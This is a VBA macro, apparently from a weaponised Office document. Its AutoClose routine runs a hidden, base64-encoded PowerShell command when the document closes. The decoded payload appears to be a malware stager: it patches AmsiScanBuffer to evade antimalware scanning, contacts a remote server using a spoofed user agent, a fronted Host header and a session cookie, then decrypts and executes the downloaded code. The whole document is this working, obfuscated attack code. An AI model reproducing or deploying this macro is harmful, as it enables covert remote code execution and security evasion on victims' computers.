Sub AutoClose()
	neeozUppozvinQ
End Sub

Public Function neeozUppozvinQ() As Variant
	Dim Ppfcp As String
	Ppfcp = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	Ppfcp = Ppfcp + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	Ppfcp = Ppfcp + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABNAG"
	Ppfcp = Ppfcp + "UAdABoAG8AZABEAGUAZgBpAG4AaQB0AGkAbwBuACAAPQAgACIA"
	Ppfcp = Ppfcp + "WwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIgBrAGUAcgBuAGUAbA"
	Ppfcp = Ppfcp + "AzADIAYAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj"
	Ppfcp = Ppfcp + "ACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AF"
	Ppfcp = Ppfcp + "AAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAA"
	Ppfcp = Ppfcp + "aABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbw"
	Ppfcp = Ppfcp + "BjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKABg"
	Ppfcp = Ppfcp + "ACIAawBlAHIAbgBlAGwAMwAyAGAAIgApAF0AcAB1AGIAbABpAG"
	Ppfcp = Ppfcp + "MAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQA"
	Ppfcp = Ppfcp + "UAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQ"
	Ppfcp = Ppfcp + "AoAHMAdAByAGkAbgBnACAAbABwAE0AbwBkAHUAbABlAE4AYQBt"
	Ppfcp = Ppfcp + "AGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKABgACIAawBlAH"
	Ppfcp = Ppfcp + "IAbgBlAGwAMwAyAGAAIgApAF0AcAB1AGIAbABpAGMAIABzAHQA"
	Ppfcp = Ppfcp + "YQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFYAaQ"
	Ppfcp = Ppfcp + "ByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAEkAbgB0AFAAdABy"
	Ppfcp = Ppfcp + "ACAAbABwAEEAZABkAHIAZQBzAHMALAAgAFUASQBuAHQAUAB0AH"
	Ppfcp = Ppfcp + "IAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUA"
	Ppfcp = Ppfcp + "dwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIA"
	Ppfcp = Ppfcp + "BsAHAAZgBsAE8AbABkAFAAcgBvAHQAZQBjAHQAKQA7ACIAOwAk"
	Ppfcp = Ppfcp + "AEsAZQByAG4AZQBsADMAMgAgAD0AIABBAGQAZAAtAFQAeQBwAG"
	Ppfcp = Ppfcp + "UAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4A"
	Ppfcp = Ppfcp + "IAAkAE0AZQB0AGgAbwBkAEQAZQBmAGkAbgBpAHQAaQBvAG4AIA"
	Ppfcp = Ppfcp + "AtAE4AYQBtAGUAIAAnAEsAZQByAG4AZQBsADMAMgAnACAALQBO"
	Ppfcp = Ppfcp + "AGEAbQBlAFMAcABhAGMAZQAgACcAVwBpAG4AMwAyACcAIAAtAF"
	Ppfcp = Ppfcp + "AAYQBzAHMAVABoAHIAdQA7ACQAQQBCAFMARAAgAD0AIAAnAEEA"
	Ppfcp = Ppfcp + "bQBzAGkAUwAnACsAJwBjAGEAbgBCAHUAZgBmAGUAcgAnADsAJA"
	Ppfcp = Ppfcp + "BoAGEAbgBkAGwAZQAgAD0AIABbAFcAaQBuADMAMgAuAEsAZQBy"
	Ppfcp = Ppfcp + "AG4AZQBsADMAMgBdADoAOgBHAGUAdABNAG8AZAB1AGwAZQBIAG"
	Ppfcp = Ppfcp + "EAbgBkAGwAZQAoACcAYQBtAHMAaQAuAGQAbABsACcAKQA7AFsA"
	Ppfcp = Ppfcp + "SQBuAHQAUAB0AHIAXQAkAEIAdQBmAGYAZQByAEEAZABkAHIAZQ"
	Ppfcp = Ppfcp + "BzAHMAIAA9ACAAWwBXAGkAbgAzADIALgBLAGUAcgBuAGUAbAAz"
	Ppfcp = Ppfcp + "ADIAXQA6ADoARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAC"
	Ppfcp = Ppfcp + "gAJABoAGEAbgBkAGwAZQAsACAAJABBAEIAUwBEACkAOwBbAFUA"
	Ppfcp = Ppfcp + "SQBuAHQAMwAyAF0AJABTAGkAegBlACAAPQAgADAAeAA1ADsAWw"
	Ppfcp = Ppfcp + "BVAEkAbgB0ADMAMgBdACQAUAByAG8AdABlAGMAdABGAGwAYQBn"
	Ppfcp = Ppfcp + "ACAAPQAgADAAeAA0ADAAOwBbAFUASQBuAHQAMwAyAF0AJABPAG"
	Ppfcp = Ppfcp + "wAZABQAHIAbwB0AGUAYwB0AEYAbABhAGcAIAA9ACAAMAA7AFsA"
	Ppfcp = Ppfcp + "VwBpAG4AMwAyAC4ASwBlAHIAbgBlAGwAMwAyAF0AOgA6AFYAaQ"
	Ppfcp = Ppfcp + "ByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAQgB1AGYAZgBl"
	Ppfcp = Ppfcp + "AHIAQQBkAGQAcgBlAHMAcwAsACAAJABTAGkAegBlACwAIAAkAF"
	Ppfcp = Ppfcp + "AAcgBvAHQAZQBjAHQARgBsAGEAZwAsACAAWwBSAGUAZgBdACQA"
	Ppfcp = Ppfcp + "TwBsAGQAUAByAG8AdABlAGMAdABGAGwAYQBnACkAOwAkAGIAdQ"
	Ppfcp = Ppfcp + "BmACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoAFsAVQBJAG4AdAAz"
	Ppfcp = Ppfcp + "ADIAXQAwAHgAQgA4ACwAWwBVAEkAbgB0ADMAMgBdADAAeAA1AD"
	Ppfcp = Ppfcp + "cALAAgAFsAVQBJAG4AdAAzADIAXQAwAHgAMAAwACwAIABbAFUA"
	Ppfcp = Ppfcp + "aQBuAHQAMwAyAF0AMAB4ADAANwAsACAAWwBVAGkAbgB0ADMAMg"
	Ppfcp = Ppfcp + "BdADAAeAA4ADAALAAgAFsAVQBpAG4AdAAzADIAXQAwAHgAQwAz"
	Ppfcp = Ppfcp + "ACkAOwBbAHMAeQBzAHQAZQBtAC4AcgB1AG4AdABpAG0AZQAuAG"
	Ppfcp = Ppfcp + "kAbgB0AGUAcgBvAHAAcwBlAHIAdgBpAGMAZQBzAC4AbQBhAHIA"
	Ppfcp = Ppfcp + "cwBoAGEAbABdADoAOgBjAG8AcAB5ACgAJABiAHUAZgAsACAAMA"
	Ppfcp = Ppfcp + "AsACAAJABCAHUAZgBmAGUAcgBBAGQAZAByAGUAcwBzACwAIAA2"
	Ppfcp = Ppfcp + "ACkAOwB9ADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAH"
	Ppfcp = Ppfcp + "IAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoA"
	Ppfcp = Ppfcp + "OgBFAHgAcABlAGMAdAAxADAAMABDAG8AbgB0AGkAbgB1AGUAPQ"
	Ppfcp = Ppfcp + "AwADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBF"
	Ppfcp = Ppfcp + "AG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAH"
	Ppfcp = Ppfcp + "QAQgB5AHQAZQBzACgAJwBJAHYAVgBeAFkAOgBGAHQAZgBDAFgA"
	Ppfcp = Ppfcp + "VAAsAD0AYQBBAE0APwBqACMANwBPAFEAcABdACYAcgB8AFsAWg"
	Ppfcp = Ppfcp + "B4AG4AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBn"
	Ppfcp = Ppfcp + "AHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AH"
	Ppfcp = Ppfcp + "wAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsA"
	Ppfcp = Ppfcp + "WwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOw"
	Ppfcp = Ppfcp + "AkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABK"
	Ppfcp = Ppfcp + "AF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9AC"
	Ppfcp = Ppfcp + "gAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQA"
	Ppfcp = Ppfcp + "UwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJA"
	Ppfcp = Ppfcp + "BTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBd"
	Ppfcp = Ppfcp + "ADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdAC"
	Ppfcp = Ppfcp + "sAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMA"
	Ppfcp = Ppfcp + "PQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALg"
	Ppfcp = Ppfcp + "BOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABzAGUAcgA9"
	Ppfcp = Ppfcp + "ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6AD"
	Ppfcp = Ppfcp + "oAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgA"
	Ppfcp = Ppfcp + "WwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQ"
	Ppfcp = Ppfcp + "A2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBj"
	Ppfcp = Ppfcp + "AEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAH"
	Ppfcp = Ppfcp + "UAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBnAEEAeABBAEMA"
	Ppfcp = Ppfcp + "NABBAE0AUQBBAHkAQQBEAGcAQQBPAGcAQQA0AEEARABBAEEAJw"
	Ppfcp = Ppfcp + "ApACkAKQA7ACQAdAA9ACcALwBjAHYAYwBuAG8AeQBxAGEALwAn"
	Ppfcp = Ppfcp + "ADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC"
	Ppfcp = Ppfcp + "4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA"
	Ppfcp = Ppfcp + "ZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg"
	Ppfcp = Ppfcp + "BQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9"
	Ppfcp = Ppfcp + "ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG"
	Ppfcp = Ppfcp + "4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA"
	Ppfcp = Ppfcp + "dABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw"
	Ppfcp = Ppfcp + "A7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3"
	Ppfcp = Ppfcp + "AGMALgBQAHIAbwB4AHkAOwAkAHcAYwAuAEgAZQBhAGQAZQByAH"
	Ppfcp = Ppfcp + "MALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwA"
	Ppfcp = Ppfcp + "IgBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbw"
	Ppfcp = Ppfcp + "B3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4"
	Ppfcp = Ppfcp + "ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzAD"
	Ppfcp = Ppfcp + "cALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcA"
	Ppfcp = Ppfcp + "ZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwA3ADkALgAwAC4AMw"
	Ppfcp = Ppfcp + "A5ADQANQAuADgAOAAgAFMAYQBmAGEAcgBpAC8ANQAzADcALgAz"
	Ppfcp = Ppfcp + "ADYAIgApADsAdAByAHkAewAkAGkAZwA9ACQAdwBjAC4ARABvAH"
	Ppfcp = Ppfcp + "cAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACkAfQBjAGEA"
	Ppfcp = Ppfcp + "dABjAGgAewB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ"
	Ppfcp = Ppfcp + "BkAGQAKAAiAEgAbwBzAHQAIgAsACIAdwBtAHcAaQBmAGIAYQBq"
	Ppfcp = Ppfcp + "AHgAeABiAGMAeABtAHUAYwB4AG0AbABjAC4AYwBvAG0AIgApAD"
	Ppfcp = Ppfcp + "sAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMA"
	Ppfcp = Ppfcp + "bwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBQADUAaQ"
	Ppfcp = Ppfcp + "BLAFYAZABlAGkATwBZAFgAYgBIAGwAYgB3AGwAVQB4AEIALwBh"
	Ppfcp = Ppfcp + "AGkANQAzADEAZwAlADMARAAiACkAOwAkAGQAYQB0AGEAPQAkAH"
	Ppfcp = Ppfcp + "cAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUA"
	Ppfcp = Ppfcp + "cgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALg"
	Ppfcp = Ppfcp + "AzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAo"
	Ppfcp = Ppfcp + "ACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAC0AMQApAF0AOwAtAG"
	Ppfcp = Ppfcp + "oAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQA"
	Ppfcp = Ppfcp + "ZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(Ppfcp)
End Function
